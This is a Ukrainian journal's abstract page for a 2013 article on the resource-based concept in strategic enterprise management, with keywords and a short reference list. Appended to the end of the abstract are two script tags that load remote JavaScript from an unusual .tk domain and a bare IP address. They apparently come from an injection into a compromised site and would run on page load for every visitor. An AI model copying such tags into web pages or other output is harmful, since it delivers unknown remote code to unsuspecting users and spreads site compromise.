ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.025.12:631
Управління та інформаційне забезпечення

Ресурсна концепція в системі стратегічного менеджменту / Дімчек Р. , Збарська А.В. // Економіка АПК. - 2013. - № 12 - С. 85

Обґрунтовано концепцію стратегічного управління підприємством як об’єктивної реальності постіндустріальної економіки. Доведено, що це викликано нетривалим терміном дії стратегічного менеджменту як самостійної науки або прикладного поля. Розглянуто різні погляди на наукову класифікацію видів і моделей стратегічного управління як в Україні, так і за кордоном. За результатами аналізу процесу стратегічного управління зроблено висновок, що з урахуванням невизначеності та тимчасових обмежень управління має бути набагато гнучкішим і маневренішим. Основний недолік традиційної системи стратегічного управління криється у відносно стабільному ринковому середовищі, яке суттєво впливає на продуктивність трудового колективу підприємства. Акцентовано увагу на тому, що використання ресурсу концепції в галузі стратегічного управління обмежене і в основному належить до раціонального використання природних ресурсів. Рис.: 1. Бібліогр.: 5.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: типологія стратегічного менеджменту, стратегічні ресурси, можливості динамічного розвитку, конкурентні переваги, сталий розвиток, ресурси, управління

Список використаних джерел

  1. Teece D.J., Pisano G.P. and Shuen A. 1997, «Dynamic capabilities and strategic management», Strategic Management Journal, 18:7, 509–533.
  2. Mintzberg H., Waters J.A., 1985, «Of Strategies, Deliberate and Emergent», Strategic Management Journal, Vol. 6, 257–272.
  3. Collis D.J. Research note: How Valuable are Organizational Capabilities? // Management Journal, 15 (Winter Special Issue): pp. 143–152.
  4. Winter S.G., 2003. Understanding Dynamic Capabilities. // Strategic Management. Vol.24, 10, 991–995.
  5. Zollo M, Winter S.G., 2002. Deliberate learning and the evolution of dynamic capabilities. // Organization Science, 13, 339–351.
Читати статтю: 13_12_85-88.pdf